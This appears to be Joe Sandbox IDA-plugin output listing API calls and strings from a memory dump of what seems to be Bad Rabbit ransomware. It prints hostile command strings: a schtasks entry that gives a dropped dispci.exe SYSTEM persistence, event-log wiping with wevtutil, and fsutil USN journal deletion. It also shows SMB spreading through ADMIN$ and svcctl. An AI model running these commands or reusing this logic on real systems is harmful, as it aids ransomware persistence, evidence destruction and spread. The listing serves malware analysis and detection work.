C:\Windows\infpub.dat, xrefs: 0047918D, 00479192, 004791C0, 0047920D

Memory Dump Source

Source File: 00000003.00000002.413534229.00471000.00000020.sdmp, Offset: 00470000, based on PE: true

Associated: 00000003.00000002.413525796.00470000.00000002.sdmp
Associated: 00000003.00000002.413541428.0047D000.00000002.sdmp
Associated: 00000003.00000002.413549631.00483000.00000004.sdmp
Associated: 00000003.00000002.413556402.00489000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_470000_rundll32.jbxd

Function 00475337, Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 157

APIs

GetProcessHeap.KERNEL32(00000008,00000024,0000FDE9,757DF0AA,00000000,?,?,?,?,0047943A,?), ref: 0047534B
HeapAlloc.KERNEL32(00000000,?,?,?,?,0047943A,?), ref: 00475352
rand.MSVCRT ref: 00475388
rand.MSVCRT ref: 004753A8
socket.WS2_32(00000002,00000001,00000006), ref: 004753B4
htons.WS2_32(000001BD), ref: 004753DA
inet_addr.WS2_32(?), ref: 004753E7
connect.WS2_32(00000000,?,00000010), ref: 004753F7
closesocket.WS2_32(00000000), ref: 004754E7

Part of subcall function 00471CA3: GetProcessHeap.KERNEL32(00000008,0000FFFF,?,00000000,00000000,00475414,00000000,?,0BADF00D,?,?,?,?,0047943A,?), ref: 00471CBD
Part of subcall function 00471CA3: RtlAllocateHeap.NTDLL(00000000,?,?,?,?,0047943A,?), ref: 00471CC6
Part of subcall function 00471CA3: GetProcessHeap.KERNEL32(00000008,00000033,?,?,?,?,0047943A,?), ref: 00471CD7
Part of subcall function 00471CA3: HeapAlloc.KERNEL32(00000000,?,?,?,?,0047943A,?), ref: 00471CDA
Part of subcall function 00471CA3: htons.WS2_32(0000002F), ref: 00471CF7
Part of subcall function 00471CA3: send.WS2_32(00000033,00000000,00000033,00000000), ref: 00471D26
Part of subcall function 00471CA3: recv.WS2_32(0000FFFF,?,0000FFFF,00000000), ref: 00471D3D
Part of subcall function 00471CA3: GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,?,0047943A,?), ref: 00471DA8
Part of subcall function 00471CA3: HeapFree.KERNEL32(00000000), ref: 00471DAF
Part of subcall function 00471CA3: GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,0047943A,?), ref: 00471DBA
Part of subcall function 00471CA3: HeapFree.KERNEL32(00000000), ref: 00471DC1

Part of subcall function 00471DD1: GetProcessHeap.KERNEL32(00000008,0000FFFF,?,00000000,?,?,?,004754D7,00000000,?,00000000,?,00000000,00000000,?,0BADF00D), ref: 00471DE9
Part of subcall function 00471DD1: HeapAlloc.KERNEL32(00000000,?,?,?,004754D7,00000000,?,00000000,?,00000000,00000000,?,0BADF00D), ref: 00471DF2
Part of subcall function 00471DD1: GetProcessHeap.KERNEL32(00000008,0000002B,00000000,?,?,?,004754D7,00000000,?,00000000,?,00000000,00000000,?,0BADF00D), ref: 00471E04
Part of subcall function 00471DD1: HeapAlloc.KERNEL32(00000000,?,?,?,004754D7,00000000,?,00000000,?,00000000,00000000,?,0BADF00D), ref: 00471E07
Part of subcall function 00471DD1: htons.WS2_32(00000027), ref: 00471E21
Part of subcall function 00471DD1: send.WS2_32(?,00000000,0000002B,00000000), ref: 00471E4A
Part of subcall function 00471DD1: recv.WS2_32(?,?,0000FFFF,00000000), ref: 00471E63
Part of subcall function 00471DD1: memset.MSVCRT ref: 00471E81
Part of subcall function 00471DD1: GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,004754D7,00000000,?,00000000,?,00000000,00000000,?,0BADF00D), ref: 00471E90
Part of subcall function 00471DD1: HeapFree.KERNEL32(00000000), ref: 00471E97
Part of subcall function 00471DD1: GetProcessHeap.KERNEL32(00000008,?,?,?,?,004754D7,00000000,?,00000000,?,00000000,00000000,?,0BADF00D), ref: 00471EA2
Part of subcall function 00471DD1: HeapFree.KERNEL32(00000000), ref: 00471EA9

Part of subcall function 004746C7: GetProcessHeap.KERNEL32(00000008,00000090,?,?,00000000,00000000,?,00000000,00000000,?), ref: 004746E4
Part of subcall function 004746C7: HeapAlloc.KERNEL32(00000000), ref: 004746E7
Part of subcall function 004746C7: Sleep.KERNEL32(000007D0,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0047478F
Part of subcall function 004746C7: GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,?,?), ref: 004747B4
Part of subcall function 004746C7: HeapFree.KERNEL32(00000000), ref: 004747B7
Part of subcall function 004746C7: GetProcessHeap.KERNEL32(00000008,00000100,?,?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 004747F0
Part of subcall function 004746C7: HeapAlloc.KERNEL32(00000000), ref: 004747F9
Part of subcall function 004746C7: GetProcessHeap.KERNEL32(00000008,00000027), ref: 00474810
Part of subcall function 004746C7: HeapAlloc.KERNEL32(00000000), ref: 00474813
Part of subcall function 004746C7: GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,00000000,00000000,00000002), ref: 00474875
Part of subcall function 004746C7: HeapFree.KERNEL32(00000000), ref: 00474878
Part of subcall function 004746C7: Sleep.KERNEL32(000007D0), ref: 0047488D
Part of subcall function 004746C7: GetProcessHeap.KERNEL32(00000008,00000029), ref: 00474897
Part of subcall function 004746C7: HeapAlloc.KERNEL32(00000000), ref: 0047489A
Part of subcall function 004746C7: GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,00000000,00000000,?), ref: 00474911
Part of subcall function 004746C7: HeapFree.KERNEL32(00000000), ref: 00474914
Part of subcall function 004746C7: GetProcessHeap.KERNEL32(00000008,00000013), ref: 004749D2
Part of subcall function 004746C7: HeapAlloc.KERNEL32(00000000), ref: 004749D5
Part of subcall function 004746C7: GetProcessHeap.KERNEL32(00000008,00000000), ref: 00474A96
Part of subcall function 004746C7: HeapFree.KERNEL32(00000000), ref: 00474A99

Part of subcall function 004721DC: GetProcessHeap.KERNEL32(00000008,0000FFFF,00000000,757DFE8D,?,?,?,?,?,?,?,?), ref: 004721F5
Part of subcall function 004721DC: HeapAlloc.KERNEL32(00000000), ref: 004721FE
Part of subcall function 004721DC: GetProcessHeap.KERNEL32(00000008,0000002D,?), ref: 00472210
Part of subcall function 004721DC: HeapAlloc.KERNEL32(00000000), ref: 00472213
Part of subcall function 004721DC: htons.WS2_32(00000029), ref: 0047222E
Part of subcall function 004721DC: send.WS2_32(?,?,0000002D,00000000), ref: 00472255
Part of subcall function 004721DC: recv.WS2_32(?,?,0000FFFF,00000000), ref: 00472271
Part of subcall function 004721DC: memset.MSVCRT ref: 00472297
Part of subcall function 004721DC: GetProcessHeap.KERNEL32(00000008,00000027), ref: 004722A3
Part of subcall function 004721DC: HeapAlloc.KERNEL32(00000000), ref: 004722A6
Part of subcall function 004721DC: htons.WS2_32(00000023), ref: 004722C1
Part of subcall function 004721DC: send.WS2_32(?,?,00000027,00000000), ref: 004722DA
Part of subcall function 004721DC: recv.WS2_32(?,?,0000FFFF,00000000), ref: 004722F2
Part of subcall function 004721DC: GetProcessHeap.KERNEL32(00000008,?), ref: 00472314
Part of subcall function 004721DC: HeapFree.KERNEL32(00000000), ref: 00472317
Part of subcall function 004721DC: GetProcessHeap.KERNEL32(00000008,?), ref: 00472323
Part of subcall function 004721DC: HeapFree.KERNEL32(00000000), ref: 00472326
Part of subcall function 004721DC: GetProcessHeap.KERNEL32(00000008,?), ref: 00472331
Part of subcall function 004721DC: HeapFree.KERNEL32(00000000), ref: 00472334

Part of subcall function 00471EB9: GetProcessHeap.KERNEL32(00000008,0000FFFF,00000000,00000000,00000000,00000000,?,0BADF00D,?,?,?,?,0047943A), ref: 00471ED2
Part of subcall function 00471EB9: HeapAlloc.KERNEL32(00000000,?,?,?,?,0047943A), ref: 00471EDB
Part of subcall function 00471EB9: GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,0047943A), ref: 00471F1F
Part of subcall function 00471EB9: HeapAlloc.KERNEL32(00000000,?,?,?,?,0047943A), ref: 00471F22
Part of subcall function 00471EB9: htons.WS2_32(?), ref: 00471F41
Part of subcall function 00471EB9: send.WS2_32(?,00000000,?,00000000), ref: 00471FF1
Part of subcall function 00471EB9: recv.WS2_32(0000FFFF,?,0000FFFF,00000000), ref: 00472008
Part of subcall function 00471EB9: GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,?,0047943A), ref: 0047202B
Part of subcall function 00471EB9: HeapFree.KERNEL32(00000000), ref: 00472032
Part of subcall function 00471EB9: GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,0047943A), ref: 0047203D
Part of subcall function 00471EB9: HeapFree.KERNEL32(00000000), ref: 00472044

Part of subcall function 00472054: GetProcessHeap.KERNEL32(00000008,0000FFFF,?,00000000,00000000,?,0BADF00D,?,?,?,?,0047943A), ref: 0047206D
Part of subcall function 00472054: HeapAlloc.KERNEL32(00000000,?,?,?,?,0047943A), ref: 00472076
Part of subcall function 00472054: GetProcessHeap.KERNEL32(00000008,?,00000000,?,?,?,?,0047943A), ref: 0047209C
Part of subcall function 00472054: HeapAlloc.KERNEL32(00000000,?,?,?,?,0047943A), ref: 0047209F
Part of subcall function 00472054: htons.WS2_32(?), ref: 004720BC
Part of subcall function 00472054: send.WS2_32(?,00000000,?,00000000), ref: 00472131
Part of subcall function 00472054: recv.WS2_32(0000FFFF,?,0000FFFF,00000000), ref: 00472148
Part of subcall function 00472054: GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,?,0047943A), ref: 00472168
Part of subcall function 00472054: HeapFree.KERNEL32(00000000), ref: 0047216F
Part of subcall function 00472054: GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,0047943A), ref: 0047217A
Part of subcall function 00472054: HeapFree.KERNEL32(00000000), ref: 00472181

Part of subcall function 0047516B: GetProcessHeap.KERNEL32(00000008,00000014,?,00000000,?,00000000,00000000,?,00000000,00000000,svcctl,00000001,?,00000000,00000000,IPC$), ref: 004751D3
Part of subcall function 0047516B: HeapAlloc.KERNEL32(00000000), ref: 004751DC
Part of subcall function 0047516B: GetProcessHeap.KERNEL32(00000008,00000020,?,?,?), ref: 00475205
Part of subcall function 0047516B: HeapAlloc.KERNEL32(00000000), ref: 00475208
Part of subcall function 0047516B: rand.MSVCRT ref: 0047521B
Part of subcall function 0047516B: rand.MSVCRT ref: 00475226
Part of subcall function 0047516B: rand.MSVCRT ref: 0047522F
Part of subcall function 0047516B: sprintf.MSVCRT ref: 00475246
Part of subcall function 0047516B: GetProcessHeap.KERNEL32(00000008,00000208,?,?,?,?,?,?,?,?,?,?,?,?,?,0047943A), ref: 00475252
Part of subcall function 0047516B: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0047943A), ref: 00475255
Part of subcall function 0047516B: sprintf.MSVCRT ref: 004752AB
Part of subcall function 0047516B: GetProcessHeap.KERNEL32(00000008,00000000,?,00000000,00000000,00000000), ref: 00475308
Part of subcall function 0047516B: HeapFree.KERNEL32(00000000), ref: 0047530B
Part of subcall function 0047516B: GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0047943A), ref: 00475316
Part of subcall function 0047516B: HeapFree.KERNEL32(00000000), ref: 00475319
Part of subcall function 0047516B: GetProcessHeap.KERNEL32(00000008,?,?,?,?), ref: 00475324
Part of subcall function 0047516B: HeapFree.KERNEL32(00000000), ref: 00475327

GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,?,0047943A,?), ref: 004754F0
HeapFree.KERNEL32(00000000), ref: 004754F7

Strings

ADMIN$, xrefs: 00475462
cscc.dat, xrefs: 00475480

Memory Dump Source

Source File: 00000003.00000002.413534229.00471000.00000020.sdmp, Offset: 00470000, based on PE: true

Associated: 00000003.00000002.413525796.00470000.00000002.sdmp
Associated: 00000003.00000002.413541428.0047D000.00000002.sdmp
Associated: 00000003.00000002.413549631.00483000.00000004.sdmp
Associated: 00000003.00000002.413556402.00489000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_470000_rundll32.jbxd

Function 0047733C, Relevance: 22.8, APIs: 9, Strings: 4, Instructions: 86

APIs

LoadLibraryW.KERNEL32(iphlpapi.dll), ref: 0047734A
GetProcAddress.KERNEL32(00000000,GetExtendedTcpTable,002E8180,00000000), ref: 00477363
GetProcessHeap.KERNEL32(00000008,Actx ), ref: 0047737E
RtlAllocateHeap.NTDLL(00000000), ref: 00477385
wsprintfW.USER32 ref: 004773DC
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00477405
HeapFree.KERNEL32(00000000), ref: 0047740C
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00477856), ref: 00477414
FreeLibrary.KERNEL32(002E8180), ref: 0047741D

Strings

Actx , xrefs: 00477373, 00477378
GetExtendedTcpTable, xrefs: 0047735D
iphlpapi.dll, xrefs: 00477343
%u.%u.%u.%u, xrefs: 004773D6

Memory Dump Source

Source File: 00000003.00000002.413534229.00471000.00000020.sdmp, Offset: 00470000, based on PE: true

Associated: 00000003.00000002.413525796.00470000.00000002.sdmp
Associated: 00000003.00000002.413541428.0047D000.00000002.sdmp
Associated: 00000003.00000002.413549631.00483000.00000004.sdmp
Associated: 00000003.00000002.413556402.00489000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_470000_rundll32.jbxd

Function 0047808E, Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 64

APIs

wsprintfW.USER32 ref: 004780BC
wsprintfW.USER32 ref: 004780CC
wsprintfW.USER32 ref: 004780DC
wsprintfW.USER32 ref: 004780EC
wsprintfW.USER32 ref: 00478126

Part of subcall function 00477FB7: wsprintfW.USER32 ref: 00477FD6
Part of subcall function 00477FB7: GetEnvironmentVariableW.KERNEL32(ComSpec,?,0000030C), ref: 00477FFA
Part of subcall function 00477FB7: GetSystemDirectoryW.KERNEL32(?,0000030C), ref: 0047800C
Part of subcall function 00477FB7: lstrcatW.KERNEL32(?,\cmd.exe), ref: 00478022
Part of subcall function 00477FB7: CreateProcessW.KERNEL32(?,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 00478069
Part of subcall function 00477FB7: Sleep.KERNELBASE(00000000), ref: 0047807F

Strings

System, xrefs: 004780BE
Application, xrefs: 004780DE
fsutil usn deletejournal /D %c:, xrefs: 0047811E
Security, xrefs: 004780CE
%wswevtutil cl %ws & , xrefs: 004780B5, 004780BA, 004780CA, 004780DA, 004780EA
Setup, xrefs: 004780A9

Memory Dump Source

Source File: 00000003.00000002.413534229.00471000.00000020.sdmp, Offset: 00470000, based on PE: true

Associated: 00000003.00000002.413525796.00470000.00000002.sdmp
Associated: 00000003.00000002.413541428.0047D000.00000002.sdmp
Associated: 00000003.00000002.413549631.00483000.00000004.sdmp
Associated: 00000003.00000002.413556402.00489000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_470000_rundll32.jbxd

Function 00471DD1, Relevance: 18.1, APIs: 12, Instructions: 84

APIs

GetProcessHeap.KERNEL32(00000008,0000FFFF,?,00000000,?,?,?,004754D7,00000000,?,00000000,?,00000000,00000000,?,0BADF00D), ref: 00471DE9
HeapAlloc.KERNEL32(00000000,?,?,?,004754D7,00000000,?,00000000,?,00000000,00000000,?,0BADF00D), ref: 00471DF2
GetProcessHeap.KERNEL32(00000008,0000002B,00000000,?,?,?,004754D7,00000000,?,00000000,?,00000000,00000000,?,0BADF00D), ref: 00471E04
HeapAlloc.KERNEL32(00000000,?,?,?,004754D7,00000000,?,00000000,?,00000000,00000000,?,0BADF00D), ref: 00471E07
htons.WS2_32(00000027), ref: 00471E21
send.WS2_32(?,00000000,0000002B,00000000), ref: 00471E4A
recv.WS2_32(?,?,0000FFFF,00000000), ref: 00471E63
memset.MSVCRT ref: 00471E81
GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,004754D7,00000000,?,00000000,?,00000000,00000000,?,0BADF00D), ref: 00471E90
HeapFree.KERNEL32(00000000), ref: 00471E97
GetProcessHeap.KERNEL32(00000008,?,?,?,?,004754D7,00000000,?,00000000,?,00000000,00000000,?,0BADF00D), ref: 00471EA2
HeapFree.KERNEL32(00000000), ref: 00471EA9

Memory Dump Source

Source File: 00000003.00000002.413534229.00471000.00000020.sdmp, Offset: 00470000, based on PE: true

Associated: 00000003.00000002.413525796.00470000.00000002.sdmp
Associated: 00000003.00000002.413541428.0047D000.00000002.sdmp
Associated: 00000003.00000002.413549631.00483000.00000004.sdmp
Associated: 00000003.00000002.413556402.00489000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_470000_rundll32.jbxd

Function 00472054, Relevance: 16.6, APIs: 11, Instructions: 110

APIs

GetProcessHeap.KERNEL32(00000008,0000FFFF,?,00000000,00000000,?,0BADF00D,?,?,?,?,0047943A), ref: 0047206D
HeapAlloc.KERNEL32(00000000,?,?,?,?,0047943A), ref: 00472076
GetProcessHeap.KERNEL32(00000008,?,00000000,?,?,?,?,0047943A), ref: 0047209C
HeapAlloc.KERNEL32(00000000,?,?,?,?,0047943A), ref: 0047209F
htons.WS2_32(?), ref: 004720BC
send.WS2_32(?,00000000,?,00000000), ref: 00472131
recv.WS2_32(0000FFFF,?,0000FFFF,00000000), ref: 00472148
GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,?,0047943A), ref: 00472168
HeapFree.KERNEL32(00000000), ref: 0047216F
GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,0047943A), ref: 0047217A
HeapFree.KERNEL32(00000000), ref: 00472181

Memory Dump Source

Source File: 00000003.00000002.413534229.00471000.00000020.sdmp, Offset: 00470000, based on PE: true

Associated: 00000003.00000002.413525796.00470000.00000002.sdmp
Associated: 00000003.00000002.413541428.0047D000.00000002.sdmp
Associated: 00000003.00000002.413549631.00483000.00000004.sdmp
Associated: 00000003.00000002.413556402.00489000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_470000_rundll32.jbxd

Function 00478A6F, Relevance: 16.6, APIs: 11, Instructions: 77

APIs

GetSystemMetrics.USER32(00002000), ref: 00478A81
Sleep.KERNELBASE(000001F4), ref: 00478A90
GetSystemMetrics.USER32(00002000), ref: 00478A93
SetEvent.KERNEL32(?), ref: 00478A9C
Sleep.KERNEL32(000003E8), ref: 00478AAB

Part of subcall function 00478A23: InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000001,00000001,80000000), ref: 00478A54
Part of subcall function 00478A23: ExitWindowsEx.USER32(00000006,00000000), ref: 00478A61
Part of subcall function 00478A23: ExitProcess.KERNEL32 ref: 00478A68

htonl.WS2_32(757DC426), ref: 00478AD4
htonl.WS2_32(757DC426), ref: 00478AE1
inet_ntoa.WS2_32(00000000), ref: 00478AE4

Part of subcall function 0047641A: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,774E2D57,?,757DC426), ref: 00476439
Part of subcall function 0047641A: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00476446
Part of subcall function 0047641A: HeapAlloc.KERNEL32(00000000), ref: 0047644D
Part of subcall function 0047641A: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?), ref: 00476465

GetProcessHeap.KERNEL32(00000000,00000000,?,00000000), ref: 00478B02
HeapFree.KERNEL32(00000000), ref: 00478B09
LocalFree.KERNEL32(?,00002000,761A679F,757DC426), ref: 00478B1F

Memory Dump Source

Source File: 00000003.00000002.413534229.00471000.00000020.sdmp, Offset: 00470000, based on PE: true

Associated: 00000003.00000002.413525796.00470000.00000002.sdmp
Associated: 00000003.00000002.413541428.0047D000.00000002.sdmp
Associated: 00000003.00000002.413549631.00483000.00000004.sdmp
Associated: 00000003.00000002.413556402.00489000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_470000_rundll32.jbxd

Function 00477FB7, Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 80

APIs

wsprintfW.USER32 ref: 00477FD6
GetEnvironmentVariableW.KERNEL32(ComSpec,?,0000030C), ref: 00477FFA
GetSystemDirectoryW.KERNEL32(?,0000030C), ref: 0047800C
lstrcatW.KERNEL32(?,\cmd.exe), ref: 00478022
CreateProcessW.KERNEL32(?,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 00478069
Sleep.KERNELBASE(00000000), ref: 0047807F

Strings

\cmd.exe, xrefs: 00478016
/c %ws, xrefs: 00477FCC
ComSpec, xrefs: 00477FF5

Memory Dump Source

Source File: 00000003.00000002.413534229.00471000.00000020.sdmp, Offset: 00470000, based on PE: true

Associated: 00000003.00000002.413525796.00470000.00000002.sdmp
Associated: 00000003.00000002.413541428.0047D000.00000002.sdmp
Associated: 00000003.00000002.413549631.00483000.00000004.sdmp
Associated: 00000003.00000002.413556402.00489000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_470000_rundll32.jbxd

Function 00471000, Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 52

APIs

Part of subcall function 00477FB7: wsprintfW.USER32 ref: 00477FD6
Part of subcall function 00477FB7: GetEnvironmentVariableW.KERNEL32(ComSpec,?,0000030C), ref: 00477FFA
Part of subcall function 00477FB7: GetSystemDirectoryW.KERNEL32(?,0000030C), ref: 0047800C
Part of subcall function 00477FB7: lstrcatW.KERNEL32(?,\cmd.exe), ref: 00478022
Part of subcall function 00477FB7: CreateProcessW.KERNEL32(?,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 00478069
Part of subcall function 00477FB7: Sleep.KERNELBASE(00000000), ref: 0047807F

Sleep.KERNELBASE(000007D0,schtasks /Delete /F /TN rhaegal,00000000,?,00000000), ref: 00471021
GetEnvironmentVariableW.KERNEL32(ComSpec,?,00000104,schtasks /Delete /F /TN rhaegal,00000000,?,00000000), ref: 00471039
GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0047104B
lstrcatW.KERNEL32(?,\cmd.exe), ref: 00471061
wsprintfW.USER32 ref: 00471087

Strings

\cmd.exe, xrefs: 00471055
schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "%ws /C Start \"\" \"%wsdispci.exe\" -id %u && exit", xrefs: 00471081
ComSpec, xrefs: 00471034
schtasks /Delete /F /TN rhaegal, xrefs: 0047100E

Memory Dump Source

Source File: 00000003.00000002.413534229.00471000.00000020.sdmp, Offset: 00470000, based on PE: true

Associated: 00000003.00000002.413525796.00470000.00000002.sdmp
Associated: 00000003.00000002.413541428.0047D000.00000002.sdmp
Associated: 00000003.00000002.413549631.00483000.00000004.sdmp
Associated: 00000003.00000002.413556402.00489000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_470000_rundll32.jbxd

Function 004711EF, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 119

APIs

RegOpenKeyW.ADVAPI32(80000002,?,?), ref: 00471204
RegQueryValueExW.KERNEL32(00000800,?,00000000,?,?,?,00000000,?), ref: 0047124F
memmove.MSVCRT ref: 00471302
memcpy.MSVCRT ref: 00471315
RegSetValueExW.KERNEL32(00000800,00000007,00000000,00000007,?,00000800), ref: 00471334
RegFlushKey.ADVAPI32(00000800), ref: 00471344
RegCloseKey.ADVAPI32(00000800), ref: 00471359

Strings

cscc, xrefs: 00471212, 00471299, 0047130F

Memory Dump Source

Source File: 00000003.00000002.413534229.00471000.00000020.sdmp, Offset: 00470000, based on PE: true

Associated: 00000003.00000002.413525796.00470000.00000002.sdmp
Associated: 00000003.00000002.413541428.0047D000.00000002.sdmp
Associated: 00000003.00000002.413549631.00483000.00000004.sdmp
Associated: 00000003.00000002.413556402.00489000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_470000_rundll32.jbxd

Function 0047742C, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 90

APIs

GetIpNetTable.IPHLPAPI(00000000,?,00000000), ref: 00477448
GetProcessHeap.KERNEL32(00000000,?,00000000), ref: 00477466
HeapAlloc.KERNEL32(00000000), ref: 0047746D
GetIpNetTable.IPHLPAPI(00000000,?,00000000), ref: 00477486
wsprintfW.USER32 ref: 004774D8
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00477504
HeapFree.KERNEL32(00000000), ref: 0047750B

Strings

%u.%u.%u.%u, xrefs: 004774D2

Memory Dump Source

Source File: 00000003.00000002.413534229.00471000.00000020.sdmp, Offset: 00470000, based on PE: true

Associated: 00000003.00000002.413525796.00470000.00000002.sdmp
Associated: 00000003.00000002.413541428.0047D000.00000002.sdmp
Associated: 00000003.00000002.413549631.00483000.00000004.sdmp
Associated: 00000003.00000002.413556402.00489000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_470000_rundll32.jbxd

Function 004710A7, Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 100

APIs

ExpandEnvironmentStringsW.KERNEL32(%ALLUSERSPROFILE%,?,00000104), ref: 004710DD

Part of subcall function 00478313: FindResourceW.KERNEL32(?,00000006,00000000), ref: 0047832A
Part of subcall function 00478313: LoadResource.KERNEL32(00000000), ref: 00478341
Part of subcall function 00478313: LockResource.KERNEL32(00000000), ref: 00478350
Part of subcall function 00478313: SizeofResource.KERNEL32(00000000), ref: 00478368
Part of subcall function 00478313: GetProcessHeap.KERNEL32(00000000,00000000,?,00000002), ref: 00478384
Part of subcall function 00478313: RtlAllocateHeap.NTDLL(00000000,?,00000002), ref: 0047838D
Part of subcall function 00478313: memcpy.MSVCRT ref: 0047839C
Part of subcall function 00478313: GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,00000002), ref: 004783B9
Part of subcall function 00478313: RtlAllocateHeap.NTDLL(00000000,?,?,?,00000002), ref: 004783BC
Part of subcall function 00478313: GetProcessHeap.KERNEL32(00000000,00000000,00000000,00000000,00000004,?,?,?,?,00000002), ref: 004783FE
Part of subcall function 00478313: HeapFree.KERNEL32(00000000), ref: 00478401
Part of subcall function 00478313: GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,00000002), ref: 0047840A
Part of subcall function 00478313: HeapFree.KERNEL32(00000000), ref: 0047840D

PathAppendW.SHLWAPI(?,dispci.exe), ref: 0047119F
HeapFree.KERNEL32(00000000), ref: 004711E3

Part of subcall function 004787E7: CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 004787FC
Part of subcall function 004787E7: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00478813
Part of subcall function 004787E7: CloseHandle.KERNEL32(00000000), ref: 00478824

Part of subcall function 00471000: Sleep.KERNELBASE(000007D0,schtasks /Delete /F /TN rhaegal,00000000,?,00000000), ref: 00471021
Part of subcall function 00471000: GetEnvironmentVariableW.KERNEL32(ComSpec,?,00000104,schtasks /Delete /F /TN rhaegal,00000000,?,00000000), ref: 00471039
Part of subcall function 00471000: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0047104B
Part of subcall function 00471000: lstrcatW.KERNEL32(?,\cmd.exe), ref: 00471061
Part of subcall function 00471000: wsprintfW.USER32 ref: 00471087

Part of subcall function 00471531: GetVersion.KERNEL32(SYSTEM\CurrentControlSet\Control\Class\{4D36E965-E325-11CE-BFC1-08002BE10318},UpperFilters,SYSTEM\CurrentControlSet\Control\Class\{71A27CDD-812A-11D0-BEC7-08002BE2092F},LowerFilters,00000000,004711D0,?,?,?), ref: 00471588

GetProcessHeap.KERNEL32(00000000,?), ref: 004711DC

Strings

%ALLUSERSPROFILE%, xrefs: 004710D8
dispci.exe, xrefs: 00471193
\, xrefs: 004710FC

Memory Dump Source

Source File: 00000003.00000002.413534229.00471000.00000020.sdmp, Offset: 00470000, based on PE: true

Associated: 00000003.00000002.413525796.00470000.00000002.sdmp
Associated: 00000003.00000002.413541428.0047D000.00000002.sdmp
Associated: 00000003.00000002.413549631.00483000.00000004.sdmp
Associated: 00000003.00000002.413556402.00489000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_470000_rundll32.jbxd

Function 004777D1, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 58

APIs

GetComputerNameExW.KERNEL32(00000004,?,?,002E8180,002E8180,002E8180), ref: 0047781B
CreateThread.KERNEL32(00000000,00000000,Function_00008B2E,002E8180,00000000,00000000), ref: 0047783D
CloseHandle.KERNEL32(00000000), ref: 00477848

Part of subcall function 0047733C: LoadLibraryW.KERNEL32(iphlpapi.dll), ref: 0047734A
Part of subcall function 0047733C: GetProcAddress.KERNEL32(00000000,GetExtendedTcpTable,002E8180,00000000), ref: 00477363
Part of subcall function 0047733C: GetProcessHeap.KERNEL32(00000008,Actx ), ref: 0047737E
Part of subcall function 0047733C: RtlAllocateHeap.NTDLL(00000000), ref: 00477385
Part of subcall function 0047733C: wsprintfW.USER32 ref: 004773DC
Part of subcall function 0047733C: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00477405
Part of subcall function 0047733C: HeapFree.KERNEL32(00000000), ref: 0047740C
Part of subcall function 0047733C: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00477856), ref: 00477414
Part of subcall function 0047733C: FreeLibrary.KERNEL32(002E8180), ref: 0047741D

Part of subcall function 0047742C: GetIpNetTable.IPHLPAPI(00000000,?,00000000), ref: 00477448
Part of subcall function 0047742C: GetProcessHeap.KERNEL32(00000000,?,00000000), ref: 00477466
Part of subcall function 0047742C: HeapAlloc.KERNEL32(00000000), ref: 0047746D
Part of subcall function 0047742C: GetIpNetTable.IPHLPAPI(00000000,?,00000000), ref: 00477486
Part of subcall function 0047742C: wsprintfW.USER32 ref: 004774D8
Part of subcall function 0047742C: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00477504
